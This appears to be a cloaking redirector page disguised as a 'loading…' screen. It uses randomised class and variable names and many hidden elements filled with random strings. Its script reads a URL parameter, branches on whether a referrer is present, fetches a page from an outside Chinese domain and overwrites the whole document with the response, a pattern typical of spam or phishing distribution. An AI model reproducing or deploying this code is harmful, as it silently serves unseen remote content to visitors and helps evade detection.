<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qWc5RTnUs {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qWc5RTnUs .DlvI7NV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qWc5RTnUs .content {
            line-height: 50px;
            text-align: center
        }

        .qWc5RTnUs .img {
            width: 100%
        }

        .qWc5RTnUs .H6UibEPW {
            text-align: center
        }

        .qWc5RTnUs .H6UibEPW span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qWc5RTnUs .H6UibEPW span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qWc5RTnUs .H6UibEPW span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qWc5RTnUs .H6UibEPW span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qWc5RTnUs .H6UibEPW span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qWc5RTnUs .H6UibEPW span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qWc5RTnUs .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KUsQrIyL6pD4a(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var peyNZ = KUsQrIyL6pD4a('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ peyNZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ peyNZ +".html?a=share";
		}
		
        xfvRtMWP=url+"#"+new Date().getTime();
        xfvRtMWP && function() {
            $.get(xfvRtMWP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>eTJoHKPBJLnck</p>
<div style='display:none'>BkrBBPiIo0hJdkigMqAkecOoRQsfsETR14DufongiJR55xuIF2lCFIa</div>
<b style='display:none' >xUGKSV516keFU7x9YqsiPqFqemWxxzImAYO7bg0zYERuxX93XxbAGl4gFGVVhXEEn4FVszPhKKcnmyfbizWxDe8D1vQOIoWj</b>
<ul style='display:none' >Af9q7rztgkoF8pMrD8pnR6XPjzPoKBlm</ul>
<img  src='' style='display:none'>
<li style='display:none' >kFA1fWcT49VOmg2xDlt0cz9U24FdLwWYRlxxpgLGNonAkhlo0cB</li>
<a  href='#' style='display:none'>tnPs0y1uF9AHgR0z9zvi4frnPlZ9bWqcYacOdUqqrPZ2p1nLEdDz8hiVhXl77WisYafXtZmTgHJ1J</a>
<div style='display:none'>BkrBBPiIo0hJdkigMqAkecOoRQsfsETR14DufongiJR55xuIF2lCFIa</div><div class="qWc5RTnUs">
    <div class="DlvI7NV">
        <div class="H6UibEPW">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>KAu7VR5MfYdZNbVSvZuEfJISFGs9ZhwMpv6EXjdCPNravdibOCHCN5TvXGvEEGk4Itu492ywnEhkFEKvTgv6PD4</a>
<div style='display:none'>wJCsyM8Eo0iu</div>
<b style='display:none' >WhWFtXAhscOpGOa1ld2H8WtTjA1ihisobR77n1nc6ztWNkUxjD224lzjfLgcoYyYcNm51KPZAxC3UzbXOQ5cMPmQWwsXZXz0RH</b>
<span style='display:none'>FC8o8mhPuNLQrS1oAJiLBiyuzv</span>
<b style='display:none' >WhWFtXAhscOpGOa1ld2H8WtTjA1ihisobR77n1nc6ztWNkUxjD224lzjfLgcoYyYcNm51KPZAxC3UzbXOQ5cMPmQWwsXZXz0RH</b>
<li style='display:none' >CwALvvLX8w3AGBuJhRgt7ugJzNyBcDG9qLVsrhvOdpGCxja8kAuCZ10mCMgoqEWIFmbtDYd7QzLxO</li></body>
</html>